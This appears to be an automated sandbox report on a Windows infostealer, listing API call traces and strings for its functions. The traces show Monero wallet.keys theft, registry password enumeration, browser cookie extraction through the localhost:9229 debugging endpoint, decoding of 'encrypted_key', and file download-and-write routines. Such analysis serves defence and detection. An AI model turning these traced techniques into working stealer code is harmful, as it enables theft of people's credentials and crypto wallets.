Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$InternetOpenlstrcpy
String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
API String ID: 3174675846-3542011879
Opcode ID: b298e41e9f65098bccb439a3afe82e3ce8cb9e6c1f71cb625a396a0dac7b7283
Instruction ID: b663a9ce6d9c8f7224be712edc04f06073bac4dfd9c61264a9597bf0c5f4b1e6
Opcode Fuzzy Hash: b298e41e9f65098bccb439a3afe82e3ce8cb9e6c1f71cb625a396a0dac7b7283
Instruction Fuzzy Hash: 575181B2D10608ABCB14EBE0DC95FEE7378AF05301F404558F60AA7191EF74AA49DF61

Function 00CE5510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00CEAAF6

Part of subcall function 00CD62D0: InternetOpenA.WININET(00CF0DFF,00000001,00000000,00000000,00000000), ref: 00CD6331
Part of subcall function 00CD62D0: StrCmpCA.SHLWAPI(?,0159E410), ref: 00CD6353
Part of subcall function 00CD62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00CD6385
Part of subcall function 00CD62D0: HttpOpenRequestA.WININET(00000000,GET,?,0159D9F8,00000000,00000000,00400100,00000000), ref: 00CD63D5
Part of subcall function 00CD62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00CD640F
Part of subcall function 00CD62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00CD6421

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00CE5568
lstrlen.KERNEL32(00000000), ref: 00CE557F

Part of subcall function 00CE8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00CE8FE2

StrStrA.SHLWAPI(00000000,00000000), ref: 00CE55B4
lstrlen.KERNEL32(00000000), ref: 00CE55D3
lstrlen.KERNEL32(00000000), ref: 00CE55FE

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Strings

ERROR, xrefs: 00CE555A
ERROR, xrefs: 00CE5682
ERROR, xrefs: 00CE56BF
ERROR, xrefs: 00CE56F9
ERROR, xrefs: 00CE5609

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 3240024479-1526165396
Opcode ID: 280ef149cbc4fbb151f7c08c4974c2ce89dbc44e9574a382b56c7cfd4c806ca2
Instruction ID: 49ae5dbdc2e2f9eb807ae8799bd2a6534dd50cc9bf630514bef779ba16e5ffc0
Opcode Fuzzy Hash: 280ef149cbc4fbb151f7c08c4974c2ce89dbc44e9574a382b56c7cfd4c806ca2
Instruction Fuzzy Hash: B651F871910188AFCB14FFA1CDA6AED7779AF20340F514468F90A57592EF307B05EB62

Function 00CE1520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID:
API String ID: 2001356338-0
Opcode ID: 6da6bf33039fea6a4bbb9a8a4df07e87ddd1e03dc8d10c57fedcb00b9dec3772
Instruction ID: f2336381a2821a1b594c1d212976b7635324d94e0f7bcafc234cc6672d7bcd38
Opcode Fuzzy Hash: 6da6bf33039fea6a4bbb9a8a4df07e87ddd1e03dc8d10c57fedcb00b9dec3772
Instruction Fuzzy Hash: 3DC191B6D002199BCF14EF61DC9AFEE7379AF54304F044598F409A7282EA70BA85DF91

Function 00CE44D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CE8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CE8F9B

lstrcat.KERNEL32(?,00000000), ref: 00CE453C
lstrcat.KERNEL32(?,0159DFB0), ref: 00CE455B
lstrcat.KERNEL32(?,?), ref: 00CE456F
lstrcat.KERNEL32(?,0159CB80), ref: 00CE4583

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CE8F20: GetFileAttributesA.KERNEL32(00000000,?,00CD1B94,?,?,00CF577C,?,?,00CF0E22), ref: 00CE8F2F

Part of subcall function 00CDA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00CDA489

Part of subcall function 00CDA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CDA13C
Part of subcall function 00CDA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CDA161
Part of subcall function 00CDA110: LocalAlloc.KERNEL32(00000040,?), ref: 00CDA181
Part of subcall function 00CDA110: ReadFile.KERNEL32(000000FF,?,00000000,00CD148F,00000000), ref: 00CDA1AA
Part of subcall function 00CDA110: LocalFree.KERNEL32(00CD148F), ref: 00CDA1E0
Part of subcall function 00CDA110: CloseHandle.KERNEL32(000000FF), ref: 00CDA1EA

Part of subcall function 00CE9550: GlobalAlloc.KERNEL32(00000000,00CE462D,00CE462D), ref: 00CE9563

StrStrA.SHLWAPI(?,0159DE30), ref: 00CE4643
GlobalFree.KERNEL32(?), ref: 00CE4762

Part of subcall function 00CDA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CD4F3E,00000000,00000000), ref: 00CDA23F
Part of subcall function 00CDA210: LocalAlloc.KERNEL32(00000040,?,?,?,00CD4F3E,00000000,?), ref: 00CDA251
Part of subcall function 00CDA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00CD4F3E,00000000,00000000), ref: 00CDA27A
Part of subcall function 00CDA210: LocalFree.KERNEL32(?,?,?,?,00CD4F3E,00000000,?), ref: 00CDA28F

lstrcat.KERNEL32(?,00000000), ref: 00CE46F3
StrCmpCA.SHLWAPI(?,00CF08D2), ref: 00CE4710
lstrcat.KERNEL32(00000000,00000000), ref: 00CE4722
lstrcat.KERNEL32(00000000,?), ref: 00CE4735
lstrcat.KERNEL32(00000000,00CF0FA0), ref: 00CE4744

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 3541710228-0
Opcode ID: 4d07b10307afd06d8eac9b4a54be72928a7633f45f2c06e0375a78512af26df0
Instruction ID: c7d0302868105ebc3f0f759941190020d709295804c3ec9747e656aacd515ed6
Opcode Fuzzy Hash: 4d07b10307afd06d8eac9b4a54be72928a7633f45f2c06e0375a78512af26df0
Instruction Fuzzy Hash: EA7146B6D00208ABDB14EBA0DD95FEE7779AB89300F044598F60997181EB35EB48DF91

Function 00CD1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CD12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CD12B4
Part of subcall function 00CD12A0: RtlAllocateHeap.NTDLL(00000000), ref: 00CD12BB
Part of subcall function 00CD12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00CD12D7
Part of subcall function 00CD12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00CD12F5
Part of subcall function 00CD12A0: RegCloseKey.ADVAPI32(?), ref: 00CD12FF

lstrcat.KERNEL32(?,00000000), ref: 00CD134F
lstrlen.KERNEL32(?), ref: 00CD135C
lstrcat.KERNEL32(?,.keys), ref: 00CD1377

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

Part of subcall function 00CE8CF0: GetSystemTime.KERNEL32(00CF0E1B,01599BB8,00CF05B6,?,?,00CD13F9,?,0000001A,00CF0E1B,00000000,?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CE8D16

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00CD1465

Part of subcall function 00CEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00CEAAF6

Part of subcall function 00CDA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CDA13C
Part of subcall function 00CDA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CDA161
Part of subcall function 00CDA110: LocalAlloc.KERNEL32(00000040,?), ref: 00CDA181
Part of subcall function 00CDA110: ReadFile.KERNEL32(000000FF,?,00000000,00CD148F,00000000), ref: 00CDA1AA
Part of subcall function 00CDA110: LocalFree.KERNEL32(00CD148F), ref: 00CDA1E0
Part of subcall function 00CDA110: CloseHandle.KERNEL32(000000FF), ref: 00CDA1EA

DeleteFileA.KERNEL32(00000000), ref: 00CD14EF

Strings

wallet_path, xrefs: 00CD1330
\Monero\wallet.keys, xrefs: 00CD138D
.keys, xrefs: 00CD136B
SOFTWARE\monero-project\monero-core, xrefs: 00CD1335

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: deef7b134584d48865e71a752fa6bf131b432e222b3636658dc0b485301b85e3
Instruction ID: 398c4641b2217e50db4aa1114c349e5b87ab710404075e466a719d27d5ca7cc9
Opcode Fuzzy Hash: deef7b134584d48865e71a752fa6bf131b432e222b3636658dc0b485301b85e3
Instruction Fuzzy Hash: 8D5143B2D502589BCB15FB60DDA2FED737C9B54300F4145E8B70A62092EE306B89DF66

Function 00CD9A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(00CF0AF6,00000001,00000000,00000000,00000000), ref: 00CD9A6A
InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00CD9AAB
InternetCloseHandle.WININET(00000000), ref: 00CD9AC7

Strings

http://localhost:9229/json, xrefs: 00CD9A9F
"webSocketDebuggerUrl":, xrefs: 00CD9B4B
"ws://, xrefs: 00CD9B84

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Internet$Open$CloseHandle
String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
API String ID: 3289985339-2144369209
Opcode ID: 4a53a08a34a2ac1249bf7e50d8d164ffa5a4ffc808eec946ca56db3e1bbfeacf
Instruction ID: daa0fe70c153bea9440a3a583f3b3ae90108851ce4c32ac7eb2f43a6dca91a18
Opcode Fuzzy Hash: 4a53a08a34a2ac1249bf7e50d8d164ffa5a4ffc808eec946ca56db3e1bbfeacf
Instruction Fuzzy Hash: 88411E75A1025CEBCB14EFA4CC95FED77B4EB48740F204155F609A7290DBB0AE84DB61

Function 00CD7630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CD7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00CD739A
Part of subcall function 00CD7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00CD7411
Part of subcall function 00CD7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00CD746D
Part of subcall function 00CD7330: GetProcessHeap.KERNEL32(00000000,?), ref: 00CD74B2
Part of subcall function 00CD7330: HeapFree.KERNEL32(00000000), ref: 00CD74B9

lstrcat.KERNEL32(00000000,00CF192C), ref: 00CD7666
lstrcat.KERNEL32(00000000,00000000), ref: 00CD76A8
lstrcat.KERNEL32(00000000, : ), ref: 00CD76BA
lstrcat.KERNEL32(00000000,00000000), ref: 00CD76EF
lstrcat.KERNEL32(00000000,00CF1934), ref: 00CD7700
lstrcat.KERNEL32(00000000,00000000), ref: 00CD7733
lstrcat.KERNEL32(00000000,00CF1938), ref: 00CD774D
task.LIBCPMTD ref: 00CD775B

Strings

: , xrefs: 00CD76AE

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: 649adc5f9e659081a8930712f824af0910673a953a9da3be49a0c2f99655f92c
Instruction ID: 99fd5af827221522c8f8b2f868b011898d245646de1704fe62a3c0567c7903a9
Opcode Fuzzy Hash: 649adc5f9e659081a8930712f824af0910673a953a9da3be49a0c2f99655f92c
Instruction Fuzzy Hash: 5D3161B2E0420DDBDB04EBA0DC95DFF7379AB45301B504219F202A33A1DB74A94AEF91

Function 00CE8290 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0159DBA8,00000000,?,00CF0E14,00000000,?,00000000), ref: 00CE82C0
RtlAllocateHeap.NTDLL(00000000), ref: 00CE82C7
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00CE82E8
__aulldiv.LIBCMT ref: 00CE8302
__aulldiv.LIBCMT ref: 00CE8310
wsprintfA.USER32 ref: 00CE833C

Strings

%d MB, xrefs: 00CE8333
@, xrefs: 00CE82DD

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 2774356765-3474575989
Opcode ID: 325d3149a6c3a1f70109ad39ce9c7bc4865c68fd8507d1d66f237d057fc17735
Instruction ID: 7590d76db0e07b55fffc8c209982b7601f1eca87afb1b51ed28aa9c96373a799
Opcode Fuzzy Hash: 325d3149a6c3a1f70109ad39ce9c7bc4865c68fd8507d1d66f237d057fc17735
Instruction Fuzzy Hash: BD2117B1E44348ABDB00DFD5CC4AFAEB7B8FB45B10F104519F619BB280D77869048BA5

Function 00CD60F0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00CEAAB0: lstrcpy.KERNEL32(?,00000000), ref: 00CEAAF6

Part of subcall function 00CD4800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00CD4889
Part of subcall function 00CD4800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00CD4899

InternetOpenA.WININET(00CF0DFB,00000001,00000000,00000000,00000000), ref: 00CD615F
StrCmpCA.SHLWAPI(?,0159E410), ref: 00CD6197
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 00CD61DF
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00CD6203
InternetReadFile.WININET(?,?,00000400,?), ref: 00CD622C
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CD625A
CloseHandle.KERNEL32(?,?,00000400), ref: 00CD6299
InternetCloseHandle.WININET(?), ref: 00CD62A3
InternetCloseHandle.WININET(00000000), ref: 00CD62B0

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

